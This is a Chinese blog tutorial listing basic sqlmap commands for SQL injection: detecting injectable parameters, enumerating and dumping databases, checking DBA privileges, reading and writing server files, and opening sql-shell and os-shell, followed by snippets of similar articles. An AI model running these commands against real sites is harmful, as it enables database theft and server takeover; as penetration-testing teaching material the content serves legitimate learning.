Sqlmap基础使用命令

最新推荐文章于 2022-02-18 21:13:27 发布
最新推荐文章于 2022-02-18 21:13:27 发布
阅读量207 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: web渗透 文章标签: mysql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42087160/article/details/107444929
本文介绍了Sqlmap的基础使用,包括检测SQL注入、获取数据库信息、表和字段详情,以及用户权限和文件操作。此外,还讲解了如何通过sql-shell和cmd-shell进行权限提升。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一,Sqlmap 注入
1,检查目标是否可以注入

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1

2,查出所有数据库

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --dbs

3,查询出当前web系统所使用多数据库信息

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --current-db

4,查询出某个数据库多所有表

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 -D school(数据库名) --tables

5,查询出某个数据库中某个表多所有列名

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 -D school(数据库名) -T student(学生表)--columns

查询出 school 这个数据库多所有表
6,查询出某个表多所有字段和值多信息

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 -D school(数据库名) -T student(student表) -C name,age,sex(学生多姓名,年龄,性别字段) --dump

二,Sqlmap用户权限
1,列出数据库管理系统用户

C:\sqlmap> sqlmap.py -u http://192.168.1.1/sql.php?id=1 --users

2,列出当前web系统中数据库配置的用户

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --current-user

3,查看当前数据库用户是否所管理员DBA

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --is-dba

4,查看用户权限

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --privileges

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --privileges -U zhangsan

三,Sqlmap文件操作
1,读取服务器上指定文件

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --file-read=/etc/profile (在windows服务器上: --file-read=C:/test.txt)

2,上传本地文件到服务器上

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --file-write /test/1.txt --file-dest /etc/test/1.txt

三,Sqlmap shell提权
1,sql-shell 直接操作sql语句

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --sql-shell
sql-shell> select version();

注意:这里由于进入了sql shell可以执行sql语句了,也可以用 load data infile、load_file、into outfile等函数来进行文件读取或写入;
2,执行 cmd shell 进行交互

C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --os-cmd=ipconfig
C:\sqlmap> sqlmap.py -u http://192.168.1.1/index.php?id=1 --os-shell
【神兵利器】——173、SQLMap基础使用
Fly_鹏程万里
10-16 188
SQLmap是一款流行的自动化SQL注入工具,它可以帮助安全测试人员和黑客自动化地探测和利用Web应用程序中的SQL注入漏洞,它支持多种不同的数据库管理系统,例如:MySQL、Oracle、PostgreSQL和Microsoft SQL Server等,SQLmap可以通过发送特定的SQL注入Payload来检测和利用SQL注入漏洞并且可以执行多种不同的操作,例如:获取数据库中的数据、绕过身份验证、执行系统命令等。
SQLmap常用命令
05-08
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,当然对于真实环境中这爆破功能战斗力基本为0....
作业二
weixin_43125060的博客
02-02 347
一.了解sql注入内容 二.使用phpstudy,sqlilabs搭建注入环境 phpstudy安装查看工具中相关链接,然后在GitHub上面下载Sqli-labs的zip包。 Sqli-labs注入环境搭建 将下载好的Sqli-labs的压缩包解压在phpstudy的网站根目录下,可以根据phpstudy客户端点击进入。 Sqli-labs注入环境搭建 配置sqli-labs的数据库,phpst...
SQLMap基本使用命令
longtangbin的博客
10-15 344
SQLMap基本使用命令 基础用法 $ sqlmap.py -u “注入地址” -v 1 --dbs // 列举数据库 $ sqlmap.py -u “注入地址” -v 1 --current-db // 当前数据库 $ sqlmap.py -u “注入地址” -v 1 --users // 列数据库用户 $ sqlmap.py -u “注入地址” -v 1 --current-user // 当前用户 $ sqlmap.py -u “注入地址” -v 1 --tables -D “数据库”
sqlmap基本使用命令及实例
P2017118的博客
10-23 881
注意:链接要先找到注入点数据库 sqlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b69a407affa2/index.php?id=15808%27‘” –current-db 表 sqlmap -u “http://119.29.191.200/ctf/7601547c91c318b3f60df2a6f1f7b6
sqlmap使用教程及基本命令
Darkray1的博客
04-25 708
一、SQLMAP用于Access数据库注入(1) 猜解是否能注入sqlmap.py -u "http://www.xxx.com/show.asp?id=1216"(2) 猜解表python sqlmap.py -u "http://www.xxx.com/show.asp?id=1216" --tables(3) 根据猜解的表进行猜解表的字段python sqlmap.py -u "http:/...
sqlmap基础命令
最新发布
12-12
它的基础命令包括: 1. **-u**: 设置目标URL,如 `sqlmap -u http://example.com`,这是最基本的命令,告诉SQLMap你要测试的网站。 2. **-D**: 指定数据库名,如果网站有多个数据库,可以指定 `-D database_name`...
渗透测试工具sqlmap基础教程.docx
10-25
渗透测试工具sqlmap基础教程 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。本文旨在帮助渗透测试的小白入门,介绍sqlmap的...
SQLMAP基础使用 -r (GET或POST)
Z_l123的博客
02-18 4431
1.访问SQLi-Labs网站 访问Less-4 http://192.168.5.116/sqli-labs/Less-4/ 2.利用Burpsuite工具抓包 1)启动Burpsuite并设置代理服务端口 2)设置Firefox代理 注意:端口要一致 3)开启 Burpsuite的代理拦截功能 4)利用Burpsuite工具拦截HTTP请求包 在Firefox地址栏中给定一个GET参数,并访问 http://192.168.5.116/sqli-labs/Less..
SQLmap基础使用
shangMD01的博客
02-18 765
实验环境 操作系统:Windows10 安装的应用软件:Sqlmap、FireFox浏览器插件HackBar;Apache、MySQL、PHP;DVWA、SQLi-Labs漏洞网站环境 实验步骤 1.访问SQLi-Labs网站Less-3 http://靶机ip/sql/Less-3 登录后,根据网页提示,先给定一个GET参数: /http://靶机ip/sql/Less-3/?id=1 2.启动SQLmap 找到SQLmap所在目录输入cmd进入命令行,输入命令启动SQLma
sqlmap命令大全
02-22
什么是SQLmapSQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令
sqlmap简单使用命令
weixin_36829246的博客
03-27 425
一、sqlmap常用基础命令 sqlmap Common operation command 以下命令顺序即为sql注入常见步骤。 sqlmap -u [“url”] --dbs #获取数据库 sqlmap -u [“url”] --current-user #获取当前用户名称 : sqlmap -u [“url”] --current-db #获取当前数据库名称 sqlmap -u [“url”...
SQLmap常用命令/使用教程
wangyuxiang946的博客
08-08 1万+
SQLmap是一款自动化SQL注入神器,用于SQL注入漏洞的检测和利用,支持多种数据库 检测位置 -u -- 指定url(GET请求) -p -- 指定参数(url包含多个参数时,指定参数) --data= -- 指定POST请求参数 --cookie -- 指定cookie参数 -r -- 从文件中加载HTTP请求(在需要检测的Header后面加上*) 获取数据 --dbs -- 获取数据库名 --tables -- 获取表名 --columns -- 获取字段名 --du
sqlmap常用命令使用方法
A_Alger的博客
07-23 958
-d DIRECT 直接连接数据库的连接字符串 -u 目标url -I 日志文件 从burp或者webScarab代理日志文件中分析目标 -x 网站地图URL 从远程网站地图(sitemap.xml)文件来解析目标 -m 文件 将目标地址保存在文件中,一行一个url地址进行批量检测 -r 请求文件 -c 配置文件 从配置ini文件中加载选项 -o 打开所有的优化开关 -p...
不用再找了,SQLMap基础命令合集版来了
南迪叶先森
07-14 3227
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! 一.SQLMap 1.SQLMap基本介绍 1.1)分析URL 判断可注入的参数 判断目标需要用哪种SQL注入 识别出目标数据库 根据命令,读取数据 1.2)注入方式 布尔盲注:基于SQL语句的比较判断的注入 时间盲注:基于返回结果是否延迟来判断是否存在注入 基于报错注入:通过报错来注入 联合查询注入:先 order by 查看字段数,再union注入。 堆查询注入:多条语句同时注入 注意: 1.可以设定HTTP(S)请求.
sqlmap
weixin_30788731的博客
03-22 174
-u #注入点 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume) –c...
sqlmap基本用法
WANGtesting的专栏
05-14 1455
sqlmap+dvwa注入的基本使用
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
热门推荐
Love&Share
12-29 2万+
文章目录使用基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值